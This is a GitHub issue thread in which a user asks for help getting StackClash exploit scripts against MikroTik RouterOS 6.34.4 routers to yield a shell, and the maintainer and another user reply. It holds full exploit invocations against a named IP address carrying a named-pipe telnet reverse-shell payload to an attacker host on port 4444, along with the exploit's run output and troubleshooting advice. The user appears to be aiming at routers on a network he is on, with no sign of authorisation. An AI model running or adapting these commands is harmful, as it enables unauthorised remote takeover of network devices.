Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Netcat or meterpreter won't connect!!! #51

Open
Husseo19 opened this issue Jun 14, 2018 · 3 comments
Open

Netcat or meterpreter won't connect!!! #51

Husseo19 opened this issue Jun 14, 2018 · 3 comments

Comments

@Husseo19
Copy link

Hey man, i am on a network with lots of RouterOs 6.34.4. Tried your scripts but can't get a connection neither through Netcat or meterpreter! I used first x86 binary file and stackclashx86.

python StackClash_x86.py 18.10.0.170 80 www_binary_x86 "/bin/mknod /ram/f p; /bin/telnet 192.168.1.105 4444 < /ram/f | /bin/bash > /ram/f 2>&1"
Building ROP chain...
[+] Binary loaded
[+] Loading gadgets, please wait...
[+] Gadgets loaded !
The ROP chain is 1912 bytes long (32768 bytes available)
Crash...
Connected
Sent
Sent
Opening 2 sockets
Connected
Connected
Stack clash...
Sent
Sent
Sent
Sending payload
Sent
Starting exploit
Done!

Netcat doesn't respond. Tips?

P.S I tried the mips Versions with corresponding mips scripts. It won't work, so i assume the device isn't misbpe arch? Here is what i got.
////////////////////////////////////////////////////////////////////////////////////////////////////////
python StackClash_mips.py 18.10.0.170 80 www_binary_mips "/bin/mknod /ram/f p; /bin/telnet 192.168.1.105 4444 < /ram/f | /bin/bash > /ram/f 2>&1"
Building shellcode + ROP chain...
Traceback (most recent call last):
File "StackClash_mips.py", line 258, in
payload = build_payload(binRop, shellCmd)
File "StackClash_mips.py", line 140, in build_payload
shell_code = build_shellcode(shellCmd)
File "StackClash_mips.py", line 93, in build_shellcode
shellCmd = bytes(shellCmd, "ascii")
TypeError: str() takes at most 1 argument (2 given)
//////////////////////////////////////////////////////////////////////////////////////////////////

Thankks in Advance!

@BigNerd95
Copy link
Owner

You have to use python3 with stackclash mips
Anyway if you have direct access to these boards you can check the arch with MNDP

@Husseo19
Copy link
Author

Thanks for the answer, but why is it that i don't get any kind of response after executing? it says the payloads is send, and the exploits starts but nothing happens after that! I tried your script from exploit_db as well
Thanks again :)

@JburkeRSAC
Copy link

JburkeRSAC commented Dec 31, 2018

I get the same issues regardless of using python3 with mipsbe build or python with x86

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

3 participants